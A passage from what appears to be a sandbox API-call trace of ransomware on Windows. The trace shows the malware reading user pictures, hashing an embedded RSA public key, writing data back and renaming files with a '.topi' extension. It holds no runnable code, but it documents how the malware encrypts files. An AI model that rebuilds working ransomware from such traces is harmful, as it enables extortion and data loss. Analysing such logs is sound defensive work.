hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0096.670] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0096.670] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0096.670] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0096.670] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0096.670] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0096.670] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0096.670] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0096.670] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.670] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0096.670] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0096.670] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0096.670] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0096.670] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0096.670] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0096.670] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.670] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4aa8 [0096.670] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0096.670] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0096.670] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.670] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0096.670] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0096.670] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0096.670] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0096.670] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4ac0 [0096.670] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0096.670] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0096.670] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0096.671] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a90 [0096.671] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0096.671] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0096.671] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.671] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0096.671] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0096.671] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0096.671] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0096.671] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4ad8 [0096.671] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0096.671] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4a30 [0096.671] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0096.671] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0096.671] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0096.671] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0096.671] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0096.671] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0096.671] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4aa8 | out: hHeap=0x680000) returned 1 [0096.671] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4aa8 [0096.671] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0096.671] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0096.671] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0096.671] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0096.671] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0096.671] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0096.671] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0096.671] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0096.671] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0096.671] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0096.671] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4aa8 | out: hHeap=0x680000) returned 1 [0096.671] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0096.671] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0096.672] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0096.672] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.672] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df228 | out: hHeap=0x680000) returned 1 [0096.672] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0096.672] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0096.672] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0096.672] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0096.672] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0096.672] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.672] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.672] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0096.672] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4ad8 | out: hHeap=0x680000) returned 1 [0096.672] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.672] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0096.672] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0096.672] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4ac0 | out: hHeap=0x680000) returned 1 [0096.672] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a90 | out: hHeap=0x680000) returned 1 [0096.672] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0096.672] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0096.672] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0096.672] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a78 | out: hHeap=0x680000) returned 1 [0096.672] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a02b88 | out: hHeap=0x680000) returned 1 [0096.672] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.672] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0096.672] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0096.672] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0096.672] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0096.672] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0096.672] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0096.672] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0096.672] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0096.672] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.672] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0096.672] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0x1225e, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0x1225e, lpOverlapped=0x0) returned 1 [0096.675] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0096.675] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x12263, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.675] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0096.676] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0096.676] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.676] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x9a04420 [0096.676] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9a04420, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0096.676] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d01f0 [0096.676] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0096.676] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.676] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d01f0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d01f0*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0096.676] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0096.676] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0096.676] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0096.676] CloseHandle (hObject=0x6a8) returned 1 [0096.677] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b41c0 [0096.677] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x890) returned 0x31cf750 [0096.677] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b41c0 | out: hHeap=0x680000) returned 1 [0096.677] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IK1V\\6LaXOT R uZJB_hl2.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ik1v\\6laxot r uzjb_hl2.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IK1V\\6LaXOT R uZJB_hl2.png.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ik1v\\6laxot r uzjb_hl2.png.topi")) returned 1 [0096.678] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.678] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.678] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.679] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4258 | out: hHeap=0x680000) returned 1 [0096.679] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x829bf3c0, ftCreationTime.dwHighDateTime=0x1d5b721, ftLastAccessTime.dwLowDateTime=0x975313f0, ftLastAccessTime.dwHighDateTime=0x1d5b7dc, ftLastWriteTime.dwLowDateTime=0x975313f0, ftLastWriteTime.dwHighDateTime=0x1d5b7dc, nFileSizeHigh=0x0, nFileSizeLow=0xd063, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cAxSc7m83M.png", cAlternateFileName="CAXSC7~1.PNG")) returned 1 [0096.679] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.679] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8e) returned 0x31b4258 [0096.679] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.679] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IK1V\\cAxSc7m83M.png") returned=".png" [0096.679] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IK1V\\cAxSc7m83M.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ik1v\\caxsc7m83m.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0096.680] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=53347) returned 1 [0096.680] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0096.682] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xd03d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.682] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0096.683] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.683] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.683] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.683] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0xd063, lpOverlapped=0x0) returned 1 [0096.684] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.684] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0096.684] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.684] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.684] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df228) returned 1 [0096.685] CryptCreateHash (in: hProv=0x6df228, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0096.685] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0096.685] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0096.685] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0096.685] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0096.685] GetLastError () returned 0x0 [0096.685] CryptDestroyHash (hHash=0x31c7580) returned 1 [0096.685] CryptReleaseContext (hProv=0x6df228, dwFlags=0x0) returned 1 [0096.685] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.685] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0096.685] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0096.685] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.685] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0096.685] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.685] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.685] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd060) returned 0x9a06a00 [0096.685] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0096.686] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.686] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0096.686] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.686] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0096.686] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0096.686] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a02b88 [0096.686] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a78 [0096.686] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a02bd0 [0096.686] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a90 [0096.686] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4ac0 [0096.686] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0096.686] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4ad8 [0096.686] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0096.686] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0096.686] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0096.686] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0096.686] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4ac0 | out: hHeap=0x680000) returned 1 [0096.686] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4ad8 | out: hHeap=0x680000) returned 1 [0096.686] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0096.686] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0096.686] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0096.686] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0096.686] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e958 [0096.686] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4ad8 [0096.686] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0096.686] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e4ac0 [0096.686] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e998 [0096.686] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0096.686] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0096.686] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0096.686] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0096.686] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0096.686] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0096.686] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0096.686] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.686] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4ad8 | out: hHeap=0x680000) returned 1 [0096.687] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.687] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4ac0 | out: hHeap=0x680000) returned 1 [0096.687] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0096.687] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0096.687] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0096.687] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0096.687] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0096.687] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.687] GetCurrentThreadId () returned 0x8c4 [0096.687] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0096.687] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f8460 [0096.687] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0096.687] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df228 [0096.687] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0096.687] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0096.687] RtlAllocateHeap 